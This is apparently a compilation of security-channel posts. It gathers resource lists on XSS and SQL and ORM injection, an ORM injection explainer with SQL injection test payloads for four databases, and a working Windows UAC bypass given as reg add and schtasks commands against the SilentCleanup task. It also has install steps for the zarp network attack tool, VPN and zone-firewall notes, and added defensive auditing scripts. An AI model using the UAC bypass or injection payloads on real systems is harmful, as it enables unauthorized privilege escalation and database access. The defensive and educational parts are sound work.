▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑#Popular Testing Methods & tools 2020 for apps-servers :
#Javascript Tools
* [Retire.js](https://retirejs.github.io/retire.js)
#Popular Commercial Tools
* [Qualys Web Scanning](https://www.qualys.com/apps/web-app-scanning/)
* [IBM Security AppScan](https://www.ibm.com/security/application-security/appscan)
#XSS - Cross-Site Scripting
- [Cross-Site Scripting – Application Security – Google](https://www.google.com/intl/sw/about/appsecurity/learning/xss/) - Introduction to XSS by [Google](https://www.google.com/).
- [H5SC](https://github.com/cure53/H5SC) - HTML5 Security Cheatsheet - Collection of HTML5 related XSS attack vectors by [@cure53](https://github.com/cure53).
- [XSS.png](https://github.com/jackmasa/XSS.png) - XSS mind map by [@jackmasa](https://github.com/jackmasa).
- [EXCESS-XSS Guide](https://excess-xss.com/) - Comprehensive tutorial on cross-site scripting by [@JakobKallin](https://github.com/JakobKallin) and [Irene Lobo Valbuena](https://www.linkedin.com/in/irenelobovalbuena/).
git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑#SQL Injection for beginners best 2020 resources :
- [SQL Injection Cheat Sheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) - Written by [@netsparker](https://twitter.com/netsparker).
- [SQL Injection Wiki](https://sqlwiki.netspi.com/) - Written by [NETSPI](https://www.netspi.com/).
- [SQL Injection Pocket Reference](https://websec.ca/kb/sql_injection)
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑#ORM Injection best 2020 Learning free practical resources :
- [HQL for pentesters](http://blog.h3xstream.com/2014/02/hql-for-pentesters.html)
- [HQL : Hyperinsane Query Language (or how to access the whole SQL API within a HQL injection ?)](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf) - Written by [@_m0bius](https://twitter.com/_m0bius).
- [ORM2Pwn: Exploiting injections in Hibernate ORM](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm)
- [ORM Injection](https://www.slideshare.net/simone.onofri/orm-injection)
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑WHAT IS ORM INJECTION & How & Why to USE ?
1️⃣ Object Relational Mapping (ORM) Injection is an attack using SQL Injection against an ORM-generated data access object model. ... ORM-generated objects can use SQL or, in some cases, a variant of SQL to perform CRUD (Create, Read, Update, Delete) operations on a database.
2️⃣ How to Test ?
> ORM layers can be prone to vulnerabilities, as they extend the surface of attack. Instead of directly targeting the application with SQL queries, you'd be focusing on abusing the ORM layer to send malicious SQL queries.
3️⃣ Identify the ORM Layer :
> To efficiently test and understand what's happening between your requests and the backend queries, and as with everything related to conducting proper testing, it is essential to identify the technology being used. By following the information gathering chapter, you should be aware of the technology being used by the application at hand. Check this list mapping languages to their respective ORMs.
4️⃣ Abusing the ORM Layer
After identifying the possible ORM being used, it becomes essential to understand how its parser functions and to study methods to abuse it or, if the application is using an old version, to identify CVEs pertaining to the library being used. Sometimes ORM layers are not properly implemented, and thus allow the tester to conduct normal SQL Injection without worrying about the ORM layer.
5️⃣ Weak ORM Implementation :
1) A vulnerable scenario where the ORM layer was not implemented properly, taken from SANS:
> List results = session.createQuery("from Orders as orders where orders.id = " + currentOrder.getId()).list();
> List results = session.createSQLQuery("Select * from Books where author = " + book.getAuthor()).list();
The above didn't implement the positional parameter, which allows the developer to replace the input with a ?. An example would be as such:
2) The same query using the positional parameter:
> Query hqlQuery = session.createQuery("from Orders as orders where orders.id = ?");
> List results = hqlQuery.setString(0, "123-ADB-567-QTWYTFDL").list(); // 0 is the first position, where it is dynamically replaced by the string set
This implementation leaves the validation and sanitization to be done by the ORM layer, and the only way to bypass it would be by identifying an issue with the ORM layer.
Powered by wiki
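A review-time check for the weak implementation shown above, as an added example that is not part of the original post: it scans Java source for `createQuery` / `createSQLQuery` calls and reports whether the query text is concatenated from non-literal parts or uses a placeholder. The sample's first three lines are the statements quoted in the post; the fourth line and all function names are constructed for illustration.

```python
import re

# Query-building calls used in the post's Hibernate snippets.
QUERY_CALL = re.compile(r"\b(createQuery|createSQLQuery)\s*\(")
PLACEHOLDER = re.compile(r"\?|:\w+")   # positional "?" or named ":param"


def call_argument(line, open_paren):
    """Text between the parenthesis at line[open_paren] and its match,
    ignoring parentheses that appear inside Java string literals."""
    depth, in_str, i = 0, False, open_paren
    while i < len(line):
        ch = line[i]
        if in_str:
            if ch == "\\":
                i += 1                      # skip the escaped character
            elif ch == '"':
                in_str = False
        elif ch == '"':
            in_str = True
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return line[open_paren + 1:i]
        i += 1
    return line[open_paren + 1:]            # unbalanced: use the rest of the line


def split_concat(expr):
    """Split a Java expression on '+' operators that sit outside string
    literals and outside nested parentheses."""
    parts, buf, depth, in_str, i = [], "", 0, False, 0
    while i < len(expr):
        ch = expr[i]
        if in_str:
            buf += ch
            if ch == "\\" and i + 1 < len(expr):
                i += 1
                buf += expr[i]
            elif ch == '"':
                in_str = False
        elif ch == "+" and depth == 0:
            parts.append(buf.strip())
            buf = ""
        else:
            if ch == '"':
                in_str = True
            elif ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            buf += ch
        i += 1
    parts.append(buf.strip())
    return parts


def is_literal(part):
    return len(part) >= 2 and part.startswith('"') and part.endswith('"')


def audit(java_source):
    """Return (line_number, call, verdict, dynamic_parts) for every query call."""
    findings = []
    for number, line in enumerate(java_source.splitlines(), 1):
        for match in QUERY_CALL.finditer(line):
            parts = split_concat(call_argument(line, match.end() - 1))
            dynamic = [p for p in parts if not is_literal(p)]
            if dynamic and len(parts) > 1:
                verdict = "concatenated"    # input spliced into the query text
            elif dynamic:
                verdict = "dynamic"         # built elsewhere: trace the variable
            elif PLACEHOLDER.search(" ".join(parts)):
                verdict = "parameterized"
            else:
                verdict = "static"
            findings.append((number, match.group(1), verdict, dynamic))
    return findings


# Constructed sample: lines 1-3 are the statements quoted in the post, line 4
# is a constructed named-parameter query with a '+' inside the string literal.
SAMPLE = "\n".join([
    'List results = session.createQuery("from Orders as orders where orders.id = " + currentOrder.getId()).list();',
    'List results = session.createSQLQuery("Select * from Books where author = " + book.getAuthor()).list();',
    'Query hqlQuery = session.createQuery("from Orders as orders where orders.id = ?");',
    'Query q = session.createQuery("from Orders o where o.total > 1+1 and o.note = :note");',
])

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

A "dynamic" verdict means the query string arrives in a variable, so the check cannot tell how it was built and the assignment has to be traced by hand.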
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Vulnerable ORM Layer
"ORM layers are code, third-party libraries most of the time. They can be vulnerable just like any other piece of code. One example could be the Sequelize ORM npm library, which was found to be vulnerable in 2019. In another research done by RIPS Tech, bypasses were identified in the Hibernate ORM used by Java."
> wiki
🦑A cheat sheet that could allow the tester to identify issues could be outlined as follows:
1️⃣ MySQL: abc\' INTO OUTFILE --
2️⃣ PostgreSQL: $$='$$=chr(61)||chr(0x27) and 1=pg_sleep(2)||version()'
3️⃣ Oracle: NVL(TO_CHAR(DBMS_XMLGEN.getxml('select 1 where 1337>1')),'1')!='1'
4️⃣ MS SQL: 1<LEN(%C2%A0(select%C2%A0top%C2%A01%C2%A0name%C2%A0from%C2%A0users)
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑WordPress uploadify Dorks Priv8 ⚠️:
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Exploiting Environment Variables in Scheduled Tasks for UAC Bypass
The Windows Task Scheduler
ADVANTAGES :
1️⃣ This is a great place to go and find privilege escalations; it's typically abused to add SUID-style capabilities to Windows in a nice, easy-to-misunderstand package.
2️⃣ It can execute programs as LocalSystem, it can auto-elevate applications for UAC, it can even host arbitrary COM objects.
3️⃣ All in all it's a mess, which is why finding bugs in the scheduler itself or in the tasks isn't especially difficult. For example here's a few I've found before. This short blog is about a quick and dirty UAC bypass I discovered which works silently even when UAC is set to the highest prompt level and can be executed without dropping any files (other than a registry key) to disk.
🦑 Let's dump some of the task's properties using PowerShell to find out.
1) We can see the Principal property, which determines what account the task runs as, and the Actions property, which determines what to run.
2) In the Principal property we can see the Group to run as is Authenticated Users, which really means it will run as the logged-on user starting the task. We also see the RunLevel is set to Highest, which means the Task Scheduler will try and elevate the task to administrator without any prompting.
3) Now look at the actions: it's specifying a path, but notice something interesting? It's using an environment variable as part of the path, and in UAC scenarios these can be influenced by a normal user by writing to the registry key HKEY_CURRENT_USER\Environment and specifying a REG_SZ value.
4) So stop beating around the bush, let's try and exploit it. I dropped a simple executable to c:\dummy\system32\cleanmgr.exe, set the windir environment variable to c:\dummy and started the scheduled task.
5) I immediately get administrator privileges. So let's automate the process. I'll use everyone's favourite language, BATCH, as we can use the reg and schtasks commands to do all the work we need. Also, as we don't want to drop a file to disk, we can abuse the fact that the executable path isn't quoted by the Task Scheduler, meaning we can inject arbitrary command line arguments and just run a simple CMD shell.
> reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM "
> schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
6) The BATCH file first sets the windir environment variable to "cmd /K" with a following script which deletes the original windir environment variable, then uses REM to comment the rest of the line out.
7) Executing this on Windows 10 Anniversary Edition and above as a split token admin will get you a shell running as an administrator. I've not tested it on any earlier versions of Windows so YMMV.
8) I didn't send this to MSRC but through a friend confirmed that it should already be fixed in a coming version of RS3, so it really looks like MS are serious about trying to lock UAC back down, at least as far as it can be.
9) If you want to mitigate now you should be able to reconfigure the task to not use environment variables using the following PowerShell script run as administrator (doing this using the UAC bypass is left as an exercise for the reader).
> $action = New-ScheduledTaskAction -Execute $env:windir\System32\cleanmgr.exe -Argument "/autoclean /d $env:systemdrive"
> Set-ScheduledTask SilentCleanup -TaskPath \Microsoft\Windows\DiskCleanup -Action $action
10) If you want to find other potential candidates the following PowerShell script will find all tasks with executable actions which will auto elevate. On my system there are 4 separate tasks, but only one (the SilentCleanup task) can be executed as a normal user, so the rest are not exploitable. Good thing I guess.
> $tasks = Get-ScheduledTask |
>     Where-Object { $_.Principal.RunLevel -ne "Limited" -and
>                    $_.Principal.LogonType -ne "ServiceAccount" -and
>                    $_.State -ne "Disabled" -and
>                    $_.Actions[0].CimClass.CimClassName -eq "MSFT_TaskExecAction" }
powered by wikisources
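A defender's audit for the condition described in steps 3, 9 and 10, as an added example that is not code from the original post or its author: it parses a Task Scheduler XML definition and reports enabled, auto-elevating tasks whose command is built from an environment variable, and whether that variable is overridden per user. The sample task XML is constructed from the properties the post describes, the function and variable names are illustrative, and treating the three well-known service SIDs as the counterpart of the post's `ServiceAccount` filter is an assumption.

```python
import re
import xml.etree.ElementTree as ET

# Namespace of Task Scheduler XML task definitions.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# LocalSystem, LocalService, NetworkService (assumption: stands in for the
# post's LogonType "ServiceAccount" filter).
SERVICE_SIDS = {"S-1-5-18", "S-1-5-19", "S-1-5-20"}
ENV_REF = re.compile(r"%([^%\s]+)%")


def audit_task(task_xml, hkcu_environment=None):
    """Return one finding per Exec action of an enabled task that runs
    elevated in a user's context and builds its command from %variables%.
    hkcu_environment is an optional dict of the values present under
    HKCU\\Environment for the account being checked."""
    per_user = {k.lower(): v for k, v in (hkcu_environment or {}).items()}
    root = ET.fromstring(task_xml)

    if root.findtext("t:Settings/t:Enabled", "true", NS).strip().lower() == "false":
        return []
    elevated_user_principal = any(
        p.findtext("t:RunLevel", "LeastPrivilege", NS).strip() == "HighestAvailable"
        and p.findtext("t:UserId", "", NS).strip() not in SERVICE_SIDS
        for p in root.findall("t:Principals/t:Principal", NS)
    )
    if not elevated_user_principal:
        return []

    findings = []
    for action in root.findall("t:Actions/t:Exec", NS):
        command = action.findtext("t:Command", "", NS).strip()
        variables = ENV_REF.findall(command)
        if variables:
            findings.append({
                "command": command,
                "variables": variables,
                # An unquoted path lets a crafted value add command-line arguments.
                "quoted": command.startswith('"') and command.endswith('"'),
                # A per-user value for a system variable such as windir is a red flag.
                "per_user_override": {v: per_user[v.lower()] for v in variables
                                      if v.lower() in per_user},
            })
    return findings


# Constructed task definitions (not exported from a real system).
TASK_TEMPLATE = """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="p">
    {identity}
    <RunLevel>{run_level}</RunLevel>
  </Principal></Principals>
  <Settings><Enabled>true</Enabled></Settings>
  <Actions Context="p"><Exec>
    <Command>{command}</Command>
    <Arguments>/autoclean /d C:</Arguments>
  </Exec></Actions>
</Task>"""

# Group "Authenticated Users" (S-1-5-11), highest run level, variable in the path.
AS_DESCRIBED = TASK_TEMPLATE.format(
    identity="<GroupId>S-1-5-11</GroupId>", run_level="HighestAvailable",
    command=r"%windir%\system32\cleanmgr.exe")
# After the step 9 reconfiguration the action holds an already expanded path.
RECONFIGURED = TASK_TEMPLATE.format(
    identity="<GroupId>S-1-5-11</GroupId>", run_level="HighestAvailable",
    command=r"C:\Windows\System32\cleanmgr.exe")
# A LocalSystem task does not read a user's HKCU\Environment values.
SYSTEM_TASK = TASK_TEMPLATE.format(
    identity="<UserId>S-1-5-18</UserId>", run_level="HighestAvailable",
    command=r"%windir%\system32\example.exe")

if __name__ == "__main__":
    for name, xml_text in [("as described", AS_DESCRIBED),
                           ("reconfigured", RECONFIGURED),
                           ("system task", SYSTEM_TASK)]:
        print(name, audit_task(xml_text, {"windir": r"c:\dummy"}))
```

Real task definitions can be obtained with `schtasks /Query /XML /TN <task>` or `Export-ScheduledTask`.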
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Top #Networking(+vpn config) new resources :
#Cisco ASA IPsec VPN
- ASA IKEv2 RA VPN With Windows or Android VPN Clients and Certificate Authentication Configuration
#Additional GET VPN Resources
- GETVPN Deployment Guide
- GETVPN Sample Configurations
#IKEv2 :
- Configuring IKEv2 VRF aware SVTI
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Firepower Threat Defense Site-to-site VPN Guidelines and Limitations :
1) A VPN connection can only be made across domains by using an extranet peer for the endpoint not in the current domain.
2) A VPN topology cannot be moved between domains.
3) Network objects with a 'range' option are not supported in VPN.
4) Firepower Threat Defense VPNs are only backed up using the Firepower Management backup.
5) The Firepower Threat Defense VPNs do not currently support PDF export and policy comparison.
6) There is no per-tunnel or per-device edit option for Firepower Threat Defense VPNs; only the whole topology can be edited.
7) Device interface address verification will not be performed for Transport mode when Crypto ACL is selected.
8) All nodes in a topology must be configured with either Crypto ACL or Protected Network. A topology may not be configured with Crypto ACL on one node and Protected Network on another.
9) There is no support for automatic mirror ACE generation. Mirror ACE generation for the peer is a manual process on either side.
10) While using Crypto ACL, there is no support for tunnel health events for VPN topologies. With Crypto ACL, there is no support for Hub, Spoke, and Full Mesh topologies; only point to point VPN is supported.
11) Whenever IKE ports 500/4500 are in use or when there are some PAT translations that are active, the Site-to-Site VPN cannot be configured on the same ports as it fails to start the service on those ports.
12) Tunnel status is not updated in real time, but at an interval of 5 minutes in the Firepower Management Center.
13) The character " (double quote) is not supported as part of pre-shared keys. If you have used " in a pre-shared key, ensure that you change the character after you upgrade to Firepower Threat Defense 6.30.
> vpnconfig source
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Network Attack Tool-any Linux :
INSTALLATION & RUN :
1️⃣ Enter the following commands on Terminal to download and install zarp:
- git clone https://github.com/hatRiot/zarp (Download zarp)
- cd zarp
- pip install -r requirements.txt (Install the required modules)
- python zarp.py
2️⃣ bryan@devbox:~/zarp$ sudo ./zarp.py --help
3️⃣ Choose options via numbers :
1 Poisoners      5 Parameter
2 DoS Attacks    6 Services
3 Sniffers       7 Attacks
4 Scanners       8 Sessions
FOR LEARNING ONLY !!!
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑#Resources about Zone-based Firewalls
#Deployment and Configuration Guides :
- Security Configuration Guide: Zone-Based Policy Firewall
- Zone-Based Policy Firewall Design and Application Guide
- Configuring ZBFW from GeeksforGeeks
LEARN BEFORE BREAK
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑#Rules For Applying Zone-Based Policy Firewall !!
Router network interfaces' membership in zones is subject to several rules that govern interface behavior, as is the traffic moving between zone member interfaces:
- A zone must be configured before interfaces can be assigned to the zone.
- An interface can be assigned to only one security zone.
- All traffic to and from a given interface is implicitly blocked when the interface is assigned to a zone, except traffic to and from other interfaces in the same zone, and traffic to any interface on the router.
- Traffic is implicitly allowed to flow by default among interfaces that are members of the same zone.
- In order to permit traffic to and from a zone member interface, a policy allowing or inspecting traffic must be configured between that zone and any other zone.
- The self zone is the only exception to the default deny all policy. All traffic to any router interface is allowed until traffic is explicitly denied.
- Traffic cannot flow between a zone member interface and any interface that is not a zone member. Pass, inspect, and drop actions can only be applied between two zones.
- Interfaces that have not been assigned to a zone function as classical router ports and might still use classical stateful inspection/CBAC configuration.
- If it is required that an interface on the box not be part of the zoning/firewall policy, it might still be necessary to put that interface in a zone and configure a pass all policy (sort of a dummy policy) between that zone and any other zone to which traffic flow is desired.
- From the preceding it follows that, if traffic is to flow among all the interfaces in a router, all the interfaces must be part of the zoning model (each interface must be a member of one zone or another).
- The only exception to the preceding deny by default approach is the traffic to and from the router, which will be permitted by default. An explicit policy can be configured to restrict such traffic.
> git sources
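The rules above expressed as a small decision model, as an added example that is not part of the original post or of any Cisco tooling: given zone membership and zone-pair policies it answers whether a new flow between two interfaces is permitted and which rule decided it. Interface names, zone names and the class itself are constructed for illustration, and policies are keyed by (source zone, destination zone) because zone pairs are directional.

```python
SELF = "self"                       # the router's own zone
ALLOWING = {"pass", "inspect"}


class ZoneFirewall:
    """Decides whether a NEW flow from one interface to another is permitted."""

    def __init__(self):
        self.zones = set()
        self.membership = {}        # interface -> zone
        self.zone_pairs = {}        # (source zone, destination zone) -> action

    def add_zone(self, zone):
        self.zones.add(zone)

    def assign(self, interface, zone):
        # A zone must exist first, and an interface joins only one zone.
        if zone not in self.zones:
            raise ValueError(f"zone {zone!r} must be configured before interfaces join it")
        if interface in self.membership:
            raise ValueError(f"{interface} already belongs to {self.membership[interface]!r}")
        self.membership[interface] = zone

    def set_policy(self, source_zone, destination_zone, action):
        # Pass, inspect and drop apply only between two zones.
        known = self.zones | {SELF}
        if source_zone == destination_zone or not {source_zone, destination_zone} <= known:
            raise ValueError("actions apply only between two distinct, configured zones")
        if action not in ALLOWING | {"drop"}:
            raise ValueError(f"unknown action {action!r}")
        self.zone_pairs[(source_zone, destination_zone)] = action

    def decide(self, source, destination):
        """source and destination are interface names, or SELF for the router."""
        src = SELF if source == SELF else self.membership.get(source)
        dst = SELF if destination == SELF else self.membership.get(destination)
        if SELF in (src, dst):
            action = self.zone_pairs.get((src, dst))
            if action is None:
                return True, "router traffic is permitted until a policy restricts it"
            return action in ALLOWING, f"explicit self-zone policy: {action}"
        if src is None and dst is None:
            return True, "neither interface is a zone member (classical router ports)"
        if src is None or dst is None:
            return False, "zone member to non-member"
        if src == dst:
            return True, "same zone"
        action = self.zone_pairs.get((src, dst))
        if action is None:
            return False, "no policy between the zones (default deny)"
        return action in ALLOWING, f"zone-pair policy: {action}"


def build_example():
    """Constructed topology: two zones, three member interfaces."""
    fw = ZoneFirewall()
    for zone in ("inside", "outside"):
        fw.add_zone(zone)
    fw.assign("Gi0/0", "inside")
    fw.assign("Gi0/1", "inside")
    fw.assign("Gi0/2", "outside")
    # Gi0/3 and Gi0/4 are deliberately left out of every zone.
    fw.set_policy("inside", "outside", "inspect")
    return fw


if __name__ == "__main__":
    fw = build_example()
    for src, dst in [("Gi0/0", "Gi0/1"), ("Gi0/0", "Gi0/2"), ("Gi0/2", "Gi0/0"),
                     ("Gi0/0", "Gi0/3"), ("Gi0/3", "Gi0/4"), ("Gi0/2", SELF)]:
        print(f"{src} -> {dst}: {fw.decide(src, dst)}")
```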